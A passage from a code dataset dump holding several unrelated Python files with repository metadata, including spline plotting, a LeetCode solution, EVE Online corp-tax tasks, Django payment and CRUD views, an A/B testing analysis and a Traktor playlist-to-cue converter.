under Python 3, so use floor division\n    x = np.linspace(1, 32, (32*5)//4)\n    y = np.random.rand((32*5)//4)\n    #y = np.sin(x)\n    tck = splrep(x, y, k=3)\n    rbf_adj = Rbf(x, y, function='gaussian')\n    x2 = np.linspace(2, 33, 32)\n    y2 = splev(x2, tck)\n    y2_rbf = rbf_adj(x2)\n    print(y2)\n    print(y2_rbf)\n    # y2 has shape 32\n\n    plt.subplot(311)\n    plt.plot(x, y)\n    plt.subplot(312)\n    #plt.plot(x2, y[8:8+16], 'r-', x2, y2, 'g--')\n    plt.plot(x2,y2,'go-')\n    #plt.plot(x2,y2)\n    plt.subplot(313)\n    plt.plot(x2, y2_rbf, 'ro-')\n    plt.show()\n\ndef main_expand():\n    x = np.linspace(1, 16, 16)\n    y = np.random.rand(16)\n    #y = np.sin(x)\n    tck = splrep(x, y, k=3)\n    x2 = np.linspace(1, 16, 32)\n    y2 = splev(x2, tck)\n    # y2 has shape 32\n\n    #new_y2 = y2[8:8+32]\n    #y3 = new_y2[np.arange(0, 31, 2).astype(int)]\n    #y4 = new_y2[np.arange(1, 32, 2).astype(int)]\n    plt.subplot(211)\n    plt.plot(x, y)\n    plt.subplot(212)\n    plt.plot(np.linspace(1,32,32), y2)\n\n    #plt.plot(x, y, 'r-', x, y3, 'g--', x, y4, 'b:')\n    #plt.plot(x2,y2)\n    plt.show()\n\ndef main():\n    x = np.linspace(0, 16, 16)\n    # y = np.random.rand(16)\n    y = np.sin(x)\n    tck = splrep(x, y, k=3)\n    x2 = np.linspace(0, 16, 48)\n    y2 = splev(x2, tck)\n    # y2 has shape 32\n\n    new_y2 = y2[8:8+32]\n    y3 = new_y2[np.arange(0, 31, 2).astype(int)]\n    y4 = new_y2[np.arange(1, 32, 2).astype(int)]\n\n    plt.plot(x, y, 'r-', x, y3, 'g--', x, y4, 'b:')\n    #plt.plot(x2,y2)\n    plt.show()\n\nif __name__ == '__main__':\n    main_compress()\n    #main_expand()\n","repo_name":"mohitsharma0690/multi_scale_head_gesture","sub_path":"utils/temporal_augmentation.py","file_name":"temporal_augmentation.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"}
+{"seq_id":"44588849210","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    
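# Swap each adjacent pair in place by rewiring next pointers: n is the second\n    # node of the current pair, and prev (a throwaway dummy on the first pass)\n    # re-links the previously swapped pair to the new front of this one.\n    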
def swapPairs(self, head: Optional[ListNode]) -> Optional[ListNode]:\n        if(not head):\n            return\n        start = head.next if head.next else head\n        prev = ListNode(val=100)\n        while head and head.next:\n            n = head.next\n            head.next = n.next\n            n.next = head\n            prev.next = n\n            prev = head\n            head = head.next\n        return start\n","repo_name":"Protype8/LeetCode","sub_path":"Linked List/Swap Nodes in Pairs - LeetCode.py","file_name":"Swap Nodes in Pairs - LeetCode.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"15824108926","text":"from calendar import monthrange\nfrom datetime import datetime, timedelta, date, timezone\nfrom functools import lru_cache\nfrom typing import Optional, Union\n\nimport requests\nfrom django.db import models\nfrom celery import shared_task\n\nfrom allianceauth.services.hooks import get_extension_logger\nfrom allianceauth.corputils.models import EveCorporationInfo\nfrom corptax.models import CorpTaxRate, CorpTaxSettings, CorpTaxOwed\nfrom corptools.models import CorporationWalletJournalEntry\n\nlogger = get_extension_logger(__name__)\nCORP_URL = 'https://esi.evetech.net/latest/corporations/{corp_id}/?datasource=tranquility'\n\n\n@shared_task\ndef update_tax_rate():\n    today = datetime.today().date()\n    for corp in EveCorporationInfo.objects.all():\n        corp_name = corp.corporation_name\n        corp_id = corp.corporation_id\n        logger.info(f'Processing tax rate for {corp_name}')\n        url = CORP_URL.format(corp_id=corp_id)\n        response = requests.get(url)\n        if response.status_code != 200:\n            logger.error(f'Problem requesting corp info from CCP for corp {corp_id} {corp_name}')\n        else:\n            corp_data = response.json()\n            tax_rate = corp_data.get('tax_rate')\n            if tax_rate is None:\n                logger.error(f'Problem with data returned by ccp for {corp_name}: {corp_data}')\n                continue\n            corp_tax_rate, created = CorpTaxRate.objects.update_or_create(corp=corp, date=today, defaults={'tax_rate': tax_rate})\n            logger.info(f'Saved tax rate for {corp_name} on {today} as {tax_rate}')\n\n\n@shared_task\ndef update_corps_in_corp_settings():\n    \"\"\"Update the corp list in CorpTaxSettings\"\"\"\n    for corp in EveCorporationInfo.objects.all():\n        settings = CorpTaxSettings.objects.filter(corp=corp)\n        if not settings:\n            corp_name = corp.corporation_name\n            logger.info(f'Creating entry in CorpTaxSettings for {corp_name}')\n            settings = CorpTaxSettings(corp=corp, taxed_at=None, taxed=False)\n            settings.save()\n            logger.info(f'Successfully created entry in CorpTaxSettings for {corp_name}')\n\n\n# @lru_cache(maxsize=128)\ndef _get_corp_tax_rate_for_day(corp: EveCorporationInfo, day: Union[datetime, date], strict: bool = False) -> float:\n    \"\"\"\n    Returns the tax rate of the corp on this day. If `strict` is set to False and no tax rate is found for the given day\n    then the nearest tax rate known will be used. 
If no tax rate is found, None is returned\n    \"\"\"\n    corp_tax_rate = CorpTaxRate.objects.filter(corp=corp, date=day)\n    if len(corp_tax_rate) == 1:\n        return corp_tax_rate[0].tax_rate\n    elif len(corp_tax_rate) > 1:\n        msg = f'Multiple entries found for {corp.corporation_name} on {day}!'\n        logger.error(msg)\n        raise SystemError(msg)\n    elif not strict:\n        # Look for tax rate of nearest day\n        closest_greater = CorpTaxRate.objects.filter(date__gt=day).order_by('date')\n        closest_less = CorpTaxRate.objects.filter(date__lt=day).order_by('-date')\n\n        closest_greater_diff = None\n        closest_less_diff = None\n        if len(closest_greater) > 0:\n            closest_greater_diff = closest_greater[0].date - day\n        if len(closest_less) > 0:\n            closest_less_diff = day - closest_less[0].date\n\n        if closest_greater_diff and closest_less_diff:\n            # Take the closest date, if tied then take the lesser date\n            return closest_greater[0].tax_rate if closest_greater_diff < closest_less_diff else closest_less[0].tax_rate\n        elif closest_less_diff is None:\n            return closest_greater[0].tax_rate\n        elif closest_greater_diff is None:\n            return closest_less[0].tax_rate\n    else:\n        logger.error(f'No tax rates found ever for {corp.corporation_name}')\n\n\n@shared_task\ndef update_tax_owed(month: int, year: Optional[int] = None):\n    # _get_corp_tax_rate_for_day.cache_clear() # Clear the cache so that DB updates are handled\n    month = datetime(year=datetime.today().year if year is None else year, month=month, day=1, tzinfo=timezone.utc)\n    end_of_month = month + timedelta(days=monthrange(month.year, month.month)[1])\n    for corp_settings in CorpTaxSettings.objects.filter(taxed=True, taxed_at__isnull=False):\n        logger.info(f'Processing tax owed for corp {corp_settings.corp.corporation_name}')\n        corp_id = corp_settings.corp.corporation_id\n        total_owed = 0\n        for wallet_entry in CorporationWalletJournalEntry.objects.filter(\n            tax_receiver_id=corp_id,\n            ref_type__in=['bounty_prizes', 'agent_mission_reward', 'ess_escrow_transfer', 'corporate_reward_payout'],\n            date__gte=month,\n            date__lt=end_of_month\n        ).order_by('date'):\n            tax_rate = _get_corp_tax_rate_for_day(corp_settings.corp, wallet_entry.date.date())\n            if tax_rate == 0:\n                logger.error(f'{corp_settings.corp} has a tax rate of 0')\n                break # TODO: decide how a corp with a 0% tax rate should be handled\n            share_of_tax_owed_to_alliance = min(1.0, corp_settings.taxed_at/tax_rate)\n            total_owed += float(wallet_entry.amount) * share_of_tax_owed_to_alliance\n\n        corp_tax_owed, created = CorpTaxOwed.objects.update_or_create(corp=corp_settings.corp, month=month, defaults={'isk_owed': total_owed})\n        logger.info(corp_tax_owed)\n\n\n@shared_task\ndef update_tax_owed_current_month():\n    now = datetime.now().date()\n    current_month = now.month\n    current_year = now.year\n    update_tax_owed(current_month, current_year)\n","repo_name":"voltatek/aa-corp-tax","sub_path":"corptax/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"25926446970","text":"import paydunya\nfrom django.contrib import messages\n\nfrom django.shortcuts import get_object_or_404, redirect, render\n\nfrom django.conf import settings\nfrom order.models import Order\nfrom payment.services.paydunya import (\n    get_invoice,\n    get_items,\n    get_user_and_course,\n    invoice_confirmation,\n)\n\n# from .tasks import payment_completed\n\n# Enable 'test' mode. Debug is False by default\npaydunya.debug = False\n\n# Configure the API keys\npaydunya.api_keys = settings.PAYDUNYA_ACCESS_TOKENS\n\n
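# payment_process below creates a PayDunya invoice for the order stored in the\n# session and redirects the buyer to the checkout URL returned by the API;\n# payment_done and payment_canceled handle the return trip.\n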
def payment_process(request):\n    order_id = request.session.get(\"order_id\")\n    user = request.user\n    order = get_object_or_404(Order, id=order_id)\n    total_cost = order.get_total_cost()\n    items = get_items(order.items.all())\n    order_item_first = order.items.all()[0]\n    custom_data = get_user_and_course(\n        order_item_first.course.id,\n        user.id,\n    )\n    try:\n        successful, response = get_invoice(\n            items,\n            total_cost,\n            request.get_host(),\n            custom_data=custom_data,\n        )\n        if successful:\n            # payment_completed.delay(order.id)\n            return redirect(response.get(\"response_text\"))\n    except Exception:\n        messages.error(request, \"An error occurred, please try again\")\n    return redirect(\"cart:cart_detail\")\n\n\ndef payment_done(request):\n    try:\n        token = request.GET.get(\"token\")\n        successful, response = invoice_confirmation(token)\n        if successful:\n            messages.success(request, \"Payment received\")\n        return render(request, \"payment/done.html\")\n    except Exception:\n        messages.error(request, \"Payment not completed\")\n        return redirect(\"cart:cart_detail\")\n\n\ndef payment_canceled(request):\n    return render(request, \"payment/canceled.html\")\n","repo_name":"cbsBiram/xarala__ssr","sub_path":"src/payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"25286748739","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom .forms import IjRegister\nfrom .models import Job\n\n# Create your views here.\ndef add_show(request):\n    if request.method == \"POST\":\n        fm = IjRegister(request.POST)\n        if fm.is_valid():\n            jid = fm.cleaned_data[\"jid\"]\n            jt = fm.cleaned_data[\"jobTitle\"]\n            jp = fm.cleaned_data[\"jobPrice\"]\n            c = fm.cleaned_data[\"company\"]\n            cntr = fm.cleaned_data[\"contractor\"]\n            jtime = fm.cleaned_data[\"jobtime\"]\n            reg = Job(jid=jid,jobTitle=jt, jobPrice=jp,company=c,contractor=cntr,jobtime=jtime)\n            reg.save()\n            fm =IjRegister()\n    else:\n        fm = IjRegister()\n    stud = Job.objects.all()\n\n    return render(request, \"ij/add_show.html\", {\"form\": fm, \"stu\": stud})\n\n\ndef update_data(request, id):\n    if request.method == \"POST\":\n        pi = Job.objects.get(pk=id)\n        fm = IjRegister(request.POST, instance=pi)\n        if fm.is_valid():\n            fm.save()\n        return HttpResponseRedirect(\"/job\")\n    else:\n        pi = Job.objects.get(pk=id)\n        fm = IjRegister(instance=pi)\n        return render(request, \"ij/update.html\", {\"form\": fm})\n\n\ndef delete_data(request, id):\n    if request.method == \"POST\":\n        pi = Job.objects.get(pk=id)\n        pi.delete()\n        return HttpResponseRedirect(\"/job\")\n\n","repo_name":"simaranirout/nexus","sub_path":"instalJob/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"1465620459","text":"'''Functions used to select order of solving sub problems'''\nimport numpy as np\nimport copy as copy\nimport time\nfrom solveSP import solveSP\n\ndef selectOrderSP(data, graphs, MPDuals, epsilon=1e-9, orderStrategy = 'random', constructionHeuristic = False):\n    '''Selects order of solving sub problems based on a given strategy'''\n\n    # Create order list\n    order = copy.copy(data['Employees'])\n    # Select order based on order strategy\n    order = globals()['orderStrategy_%s' % orderStrategy](order = 
order, data = data,\n graphs = graphs, MPDuals = MPDuals,\n epsilon = epsilon,\n constructionHeuristic = constructionHeuristic)\n return order\n\ndef orderStrategy_random(order, data, graphs, MPDuals, epsilon, constructionHeuristic):\n '''Shuffling order of SPs randomly'''\n\n np.random.shuffle(order)\n return order\n\ndef orderStrategy_noResourcesSP(order, data, graphs, MPDuals, epsilon, constructionHeuristic):\n '''Solves all SPs without resources, and selects order based on ascending\n objective value.'''\n \n timeStart = time.time()\n # Preallocate space for solutions\n SPobjectives = dict.fromkeys(e for e in data['Employees'])\n SPsolutions = dict.fromkeys(e for e in data['Employees'])\n objectives = np.zeros(data['nEmployees']) # List of objectives to sort later\n # Solve SP without resources for each employee\n for employee in data['Employees']:\n [SPobjectives[employee],\n SPsolutions[employee]] = solveSP(data=data, employee=employee,\n graph=graphs[employee],\n duals=MPDuals, epsilon=epsilon,\n resourceVec = [],\n constructionHeuristic = constructionHeuristic)\n\n # Add employee to order if solutions were found\n if SPobjectives[employee] != None:\n objectives[employee - 1] = SPobjectives[employee][1]\n # If no solution was found, return None as one of the SPs is infeasible\n else:\n return None\n\n # Sort order after ascending SP objective value\n order = [x for _,x in sorted(zip(objectives,order))]\n\n return order\n","repo_name":"sandercoates/HRP","sub_path":"model/selectOrderSP.py","file_name":"selectOrderSP.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43130624421","text":"\n############################################\n# AB Testing\n############################################\n\n###################################################\n# Imports, Functions and Settings.\n###################################################\n\nimport pandas as pd\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.stats import shapiro, levene, ttest_ind, mannwhitneyu\nfrom statsmodels.stats.proportion import proportions_ztest\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\npd.set_option('display.float_format', lambda x: '%.5f' % x)\npd.set_option('display.width', 500)\n\ndef check_df(dataframe,head=5):\n print(\"##Shape##\")\n print(dataframe.shape)\n print(\"##Types##\")\n print(dataframe.dtypes)\n print(\"##Head##\")\n print(dataframe.head(head))\n print(\"##Tail##\")\n print(dataframe.tail(head))\n print(\"##Missingentries##\")\n print(dataframe.isnull().sum())\n print(\"##Quantiles##\")\n print(dataframe.quantile([0,0.05,0.50,0.95,0.99,1]).T)\n print(\"##generalinformation##\")\n print(dataframe.describe().T)\n\n\n###################################################\n# Importing data and taking a first look\n###################################################\n\ndf_control = pd.read_excel(\"ab_testing_veri/ab_testing.xlsx\" , sheet_name=\"Control Group\")\ndf_test = pd.read_excel(\"ab_testing_veri/ab_testing.xlsx\" , sheet_name=\"Test Group\")\n\ncheck_df(df_control)\ncheck_df(df_test)\noriginalCols = df_control.columns\n#Adding the test group to the control group\ndf_control[\"Group\"] = \"Control\"\ndf_test[\"Group\"] = \"Test\"\n\ndf = pd.concat([df_control,df_test],axis=0,ignore_index=False)\ndf.head()\n\n## A/B Test\n\n# H0 : M1 = M2 There is no significant difference between the purchases of the test and 
control groups.\n# H1 : M1 != M2 There is a significant difference between the purchases of the test and control groups.\n\n# Average purchases for both test and control groups\n\ndf.groupby(\"Group\").mean()\n# Impression Click Purchase Earning\n# Group\n# Control 101711.44907 5100.65737 550.89406 1908.56830\n# Test 120512.41176 3967.54976 582.10610 2514.89073\n# We can see that there is an increment, but it might happen by chance.\n\n################################################################\n\n## Before getting into A/B testing, we should check the assumptions first by\n## testing normality and homogeneity of variance for independent samples t-tests\n\n## Normality Test:\n\n# H0: the population is normally distributed\n# H1: the population is not normally distributed\n# p < 0.05 H0 Rejected\n# p > 0.05 H0 Can't be rejected\n\n## Check the normality in the Control group:\n\nfor col in originalCols:\n    test_stat, pvalue = shapiro(df.loc[df[\"Group\"] == \"Control\", col])\n    print(col + ' Results: \\n Test Stat = %.4f, p-value = %.4f\\n' % (test_stat, pvalue))\n\n# Control Group normality test:\n\n# Impression Results:\n# Test Stat = 0.9697, p-value = 0.3514\n\n# Click Results:\n# Test Stat = 0.9844, p-value = 0.8461\n\n# Purchase Results:\n# Test Stat = 0.9773, p-value = 0.5891\n\n# Earning Results:\n# Test Stat = 0.9756, p-value = 0.5306\n\n# H0 can't be rejected for any of the variables, which means they are normally distributed.\n\n\n## Check the normality in the Test group:\nfor col in originalCols:\n    test_stat, pvalue = shapiro(df.loc[df[\"Group\"] == \"Test\", col])\n    print(col + ' Results: \\n Test Stat = %.4f, p-value = %.4f\\n' % (test_stat, pvalue))\n\n# Test Group normality test:\n\n# Impression Results:\n# Test Stat = 0.9720, p-value = 0.4148\n#\n# Click Results:\n# Test Stat = 0.9896, p-value = 0.9699\n#\n# Purchase Results:\n# Test Stat = 0.9589, p-value = 0.1541\n#\n# Earning Results:\n# Test Stat = 0.9780, p-value = 0.6163\n\n# Same as the control group, H0 can't be rejected for any of the variables, which means they are normally distributed.\n\n# Now that we found that both groups are normally distributed, it's time to check the variance homogeneity\n# Alternative: If the normality assumption wasn't satisfied we can use another test: Mann-Whitney\n\n###########################################################\n\n## The Variance Homogeneity:\n\n# H0: There is no significant statistical difference between the variances of purchases of the test and control groups.\n# H1: There is a significant statistical difference between the variances of purchases of the test and control groups.\n# p < 0.05 H0 Rejected\n# p > 0.05 H0 Can't be rejected\n\nfor col in originalCols:\n    test_stat, pvalue = levene(df.loc[df[\"Group\"] == \"Control\", col],\n                               df.loc[df[\"Group\"] == \"Test\", col])\n    print(col + ' results: \\n Test Stat = %.4f, p-value = %.4f\\n' % (test_stat, pvalue))\n\n# Impression results:\n# Test Stat = 0.5865, p - value = 0.4461\n\n# Click results:\n# Test Stat = 6.3041, p - value = 0.0141\n\n# Purchase results:\n# Test Stat = 2.6393, p - value = 0.1083\n\n# Earning results:\n# Test Stat = 0.3532, p - value = 0.5540\n\n# H0 can't be rejected for all variables except Click.\n# We can say that there is NO statistically significant difference between the variance distributions of the variables\n# of the 2 groups, except for Click: there IS a statistically significant difference between the variance\n# distributions of the Click values of the 2 groups.\n\n# Alternative: If the variance homogeneity assumption wasn't satisfied, we could pass\n# equal_var=False to the t-test to handle that situation.\n
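# For example, a Welch test on Purchase (no equal-variance assumption) would be:\n#   ttest_ind(df.loc[df[\"Group\"] == \"Control\", \"Purchase\"],\n#             df.loc[df[\"Group\"] == \"Test\", \"Purchase\"], equal_var=False)\n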
###########################################################\n\n## A/B Testing:\n\n## Purchases\n\ntest_stat,pvalue = ttest_ind(df.loc[df[\"Group\"] == \"Control\",\"Purchase\"],df.loc[df[\"Group\"] == \"Test\",\"Purchase\"],equal_var=True)\n\nprint(\"Test Stat = %.4f, pvalue = %.4f\" %(test_stat,pvalue)) # Test Stat = -0.9416, pvalue = 0.3493\n\n# H0 can't be rejected.\n\n######################################################\n\n## Impression\n\ntest_stat,pvalue = ttest_ind(df.loc[df[\"Group\"] == \"Control\",\"Impression\"],df.loc[df[\"Group\"] == \"Test\",\"Impression\"],equal_var=True)\n\nprint(\"Test Stat = %.4f, pvalue = %.4f\" %(test_stat,pvalue)) # Test Stat = -4.2966, pvalue = 0.0000\n\n# H0 is rejected.\n\n######################################################\n\n## Earning\n\ntest_stat,pvalue = ttest_ind(df.loc[df[\"Group\"] == \"Control\",\"Earning\"],df.loc[df[\"Group\"] == \"Test\",\"Earning\"],equal_var=True)\n\nprint(\"Test Stat = %.4f, pvalue = %.4f\" %(test_stat,pvalue)) # Test Stat = -9.2545, pvalue = 0.0000\n\n# H0 is rejected.\n\n######################################################\n\n## Click\n\ntest_stat,pvalue = mannwhitneyu(df.loc[df[\"Group\"] == \"Control\",\"Click\"],df.loc[df[\"Group\"] == \"Test\",\"Click\"])\n\nprint(\"Test Stat = %.4f, pvalue = %.4f\" %(test_stat,pvalue)) # Test Stat = 1198.0000, pvalue = 0.0001\n\n# H0 is rejected.\n\n\n##############################################################\n# Conclusions\n##############################################################\n\n# The Independent Samples t-Test was chosen for the A/B testing as both assumptions were\n# satisfied for Purchase, Impression and Earning.\n\n# The mannwhitneyu method was chosen for the Click comparison as there is a statistically significant difference\n# between the variance distributions of the Click values of the 2 groups.\n\n# For Purchase, H0 can't be rejected, which means there is no significant difference between the new bidding system and the old one.\n\n##### Results ######\n# Purchase: Maximum bidding (Control Group) and Average bidding (Test Group) have the same average\n# Click: Maximum bidding (Control Group) and Average bidding (Test Group) don't have the same average (higher)\n# Impression: Maximum bidding (Control Group) and Average bidding (Test Group) don't have the same average (higher)\n# Earning: Maximum bidding (Control Group) and Average bidding (Test Group) don't have the same average (higher)\n\n\n\n##############################################################\n# Two Group Ratio Comparison\n##############################################################\n\n# Check if both tests have at least 30 samples:\ndf_control.shape # 40\ndf_test.shape # 40\n\n\ndf[\"Purchase_Per_Impression\"] = df[\"Purchase\"] / df[\"Impression\"]\ndf[\"Purchase_Per_Click\"] = df[\"Purchase\"] / df[\"Click\"]\ndf[\"Earning_Per_Click\"] = df[\"Earning\"] / df[\"Click\"]\ndf[\"Earning_Per_Impression\"] = df[\"Earning\"] / df[\"Impression\"]\n\ndf.head()\n\n# Impression Click Purchase Earning Group Purchase_Per_Impression Purchase_Per_Click Earning_Per_Click Earning_Per_Impression\n# 0 82529.45927 6090.07732 665.21125 2311.27714 Control 0.00806 0.10923 0.37952 0.02801\n# 1 98050.45193 3382.86179 315.08489 1742.80686 Control 0.00321 0.09314 0.51519 0.01777\n# 2 82696.02355 4167.96575 458.08374 1797.82745 Control 0.00554 0.10991 0.43134 0.02174\n# 3 109914.40040 
4910.88224 487.09077 1696.22918 Control 0.00443 0.09919 0.34540 0.01543\n# 4 108457.76263 5987.65581 441.03405 1543.72018 Control 0.00407 0.07366 0.25782 0.01423\n\ndf.groupby(\"Group\")[\"Purchase_Per_Impression\",\"Purchase_Per_Click\",\"Earning_Per_Click\",\"Earning_Per_Impression\"].mean()\n\n# Purchase_Per_Impression Purchase_Per_Click Earning_Per_Click Earning_Per_Impression\n# Group\n# Control 0.00558 0.11593 0.40835 0.01947\n# Test 0.00492 0.15657 0.66830 0.02140\n\npurchase_sum = np.array ([df_control[\"Purchase\"].sum (), df_test[\"Purchase\"].sum ()])\nclick_sum = np.array ([df_control[\"Click\"].sum (), df_test[\"Click\"].sum ()])\nimpression_sum = np.array ([df_control[\"Impression\"].sum (), df_test[\"Impression\"].sum ()])\nEarning_sum = np.array ([df_control[\"Earning\"].sum (), df_test[\"Earning\"].sum ()])\n\n#############################################################################\n\n# Now the data is ready to be compared:\n\n# Purchase_Per_Impression\nttest_z, pvalue = proportions_ztest (purchase_sum, impression_sum)\nprint('Test Stat = %.4f, p-value = %.4f' % (ttest_z, pvalue))\n# Test Stat = 12.2212, p-value = 0.0000\n\n\n# Purchase_Per_Click\nttest_z, pvalue = proportions_ztest (purchase_sum, click_sum)\nprint('Test Stat = %.4f, p-value = %.4f' % (ttest_z, pvalue))\n# Test Stat = -34.9800, p-value = 0.0000\n\n\n# Earning_Per_Click\nttest_z, pvalue = proportions_ztest (Earning_sum, click_sum)\nprint('Test Stat = %.4f, p-value = %.4f' % (ttest_z, pvalue))\n# Test Stat = -155.2202, p-value = 0.0000\n\n\n# Earning_Per_Impression\nttest_z, pvalue = proportions_ztest (Earning_sum, impression_sum)\nprint('Test Stat = %.4f, p-value = %.4f' % (ttest_z, pvalue))\n# Test Stat = -22.3725, p-value = 0.0000\n\n\n#############################################################################\n\n##### Results ######\n\n# Purchase_Per_Impression: Maximum bidding (Control Group) and Average bidding (Test Group) doesn't have the same\n# average (lower)\n\n# Purchase_Per_Click: Maximum bidding (Control Group) and Average bidding (Test Group) doesn't have the same\n# average (Higher)\n\n# Earning_Per_Click: Maximum bidding (Control Group) and Average bidding (Test Group) doesn't have the same\n# average (Higher)\n\n# Earning_Per_Impression: Maximum bidding (Control Group) and Average bidding (Test Group) doesn't have the same\n# average (Higher)\n","repo_name":"BeshOZ/AB_Testing","sub_path":"AB_Test.py","file_name":"AB_Test.py","file_ext":"py","file_size_in_byte":11426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20305893564","text":"import sys\nimport argparse\n\nfrom xml.dom import minidom\nfrom datetime import datetime, timedelta\n\nclass MyParser(argparse.ArgumentParser):\n def error(self, message):\n sys.stderr.write('error: %s\\n' % message)\n self.print_help()\n sys.exit(2)\n\nparser = MyParser(description='Convert a Traktor nml playlist to a cue file.')\nparser.add_argument('input', help='The nml file that will serve as input.')\nparser.add_argument('output', help='The cue file that will be written.')\nparser.add_argument('performer', help='Used for the PERFORMER tag in the cue file.')\nparser.add_argument('title', help='Used for the TITLE tag in the cue file.')\nparser.add_argument('audiofile', help='The name of the audio file that the cue file should refer to.')\nparser.add_argument('audiotype', help='The type of the audio file that the cue file should refer to: MP3, WAVE or 
ALAC.')\nparser.add_argument('offset', help='Offset to compensate for the discrepancy between t0 of the nml and t0 of the audio file.')\n\nargs = parser.parse_args()\n\ninput_file_name = args.input\noutput_file_name = args.output\n\noutput_file = open(output_file_name, \"w\")\n\nnml = minidom.parse(input_file_name)\n\ncollection_entries = nml.getElementsByTagName(\"COLLECTION\")[0].getElementsByTagName(\"ENTRY\")\n\nartists = {}\ntitles = {}\n\nfor entry in collection_entries:\n location = entry.getElementsByTagName(\"LOCATION\")[0]\n dir = location.getAttribute(\"DIR\")\n file = location.getAttribute(\"FILE\")\n key = dir + file\n \n artist = entry.getAttribute(\"ARTIST\")\n title = entry.getAttribute(\"TITLE\")\n\n artists[key] = artist\n titles[key] = title\n\nplaylist_entries = nml.getElementsByTagName(\"PLAYLIST\")[0].getElementsByTagName(\"ENTRY\")\n\nfirst_song_start_timestamp = -1\ntrack_counter = 1\n\ncue_performer_tag = f\"PERFORMER \\\"{args.performer}\\\"\"\ncue_title_tag = f\"TITLE \\\"{args.title}\\\"\"\ncue_file_tag = f\"FILE \\\"{args.audiofile}\\\" {args.audiotype}\"\n\noutput_file.write(cue_performer_tag + \"\\n\")\noutput_file.write(cue_title_tag + \"\\n\")\noutput_file.write(cue_file_tag + \"\\n\")\n\nfor entry in playlist_entries:\n pkey = entry.getElementsByTagName(\"PRIMARYKEY\")[0]\n key = pkey.getAttribute(\"KEY\")[2:]\n \n ext_data = entry.getElementsByTagName(\"EXTENDEDDATA\")[0]\n start_time = int(ext_data.getAttribute(\"STARTTIME\"))\n\n if first_song_start_timestamp == -1:\n first_song_start_timestamp = start_time\n else:\n start_time -= int(args.offset)\n\n dt = str(datetime.fromtimestamp(start_time - first_song_start_timestamp)- timedelta(hours=1))[11:]\n \n hours_in_minutes = int(dt[0:2]) * 60\n minutes = int(dt[3:5]) + hours_in_minutes\n index_time = str(minutes) + dt[5:8] + \":00\"\n \n track_tag = f\" TRACK \" + str(track_counter).zfill(2) + \" AUDIO\"\n performer_tag = f\" PERFORMER \\\"\" + artists[key] + \"\\\"\"\n title_tag = f\" TITLE \\\"\" + titles[key] + \"\\\"\"\n index_tag = f\" INDEX 01 \" + index_time\n \n output_file.write(track_tag + \"\\n\")\n output_file.write(performer_tag + \"\\n\")\n output_file.write(title_tag + \"\\n\")\n output_file.write(index_tag + \"\\n\")\n \n track_counter += 1\n","repo_name":"izzyreal/nml2cue","sub_path":"nml2cue.py","file_name":"nml2cue.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9882595490","text":"import math\nx = 0\nstatement = 2\npi = 1\n\nwhile(statement > 1):\n pi = pi*statement\n x = math.sqrt(2 + x)\n statement = 2/x\n \nprint(\"Approximation of pi: \" + str(round(pi, 3)))\n#pi = round(pi, 3)\nrad = eval(input(\"Enter the radius:\\n\"))\narea = pi*(rad**2)\nprint(\"Area: \" + str(round(area, 3)))\n\n\n'''\nApproximation of pi: 3.142\nEnter the radius:\n2.5\nArea: 19.635\n'''\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_2/smyjas002/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30261354979","text":"import numpy as np\nfrom sim.Util import clog2\nfrom sim.SNG import lfsr_sng\n\ndef scc(bsx, bsy):\n \"\"\"Compute the stochastic cross-correlation between two bitstreams according to Eq. (1)\n in [A. Alaghi and J. P. 
Hayes, Exploiting correlation in stochastic circuit design]\"\"\"\n if bsx.dtype == np.dtype('uint8'):\n bsx = np.unpackbits(bsx)\n\n if bsy.dtype == np.dtype('uint8'):\n bsy = np.unpackbits(bsy)\n\n px = np.mean(bsx)\n py = np.mean(bsy)\n if px in (0, 1) or py in (0, 1):\n #raise ValueError(\"SCC is undefined for bitstreams with value 0 or 1\") \n return 0\n p_uncorr = px * py\n p_actual = np.mean(np.bitwise_and(bsx, bsy))\n if p_actual > p_uncorr:\n return (p_actual - p_uncorr) / (np.minimum(px, py) - p_uncorr)\n else:\n return (p_actual - p_uncorr) / (p_uncorr - np.maximum(px + py - 1, 0))\n \ndef reco_2(bsx, bsy):\n #Re-generate positive correlation between bitstreams\n\n if bsx.dtype == np.dtype('uint8'):\n bsx = np.unpackbits(bsx)\n\n if bsy.dtype == np.dtype('uint8'):\n bsy = np.unpackbits(bsy)\n\n px = np.mean(bsx)\n py = np.mean(bsy)\n\n N = bsx.size\n w = clog2(N)\n bs_mat = lfsr_sng(np.array([px, py]), N, w, corr=True)\n return bs_mat[0, :], bs_mat[1, :]","repo_name":"OwenHoffend/sc_sim2","sub_path":"sim/SCC.py","file_name":"SCC.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18819356529","text":"import logging\nimport re\nfrom collections import namedtuple\nfrom typing import Generator, List, Optional, 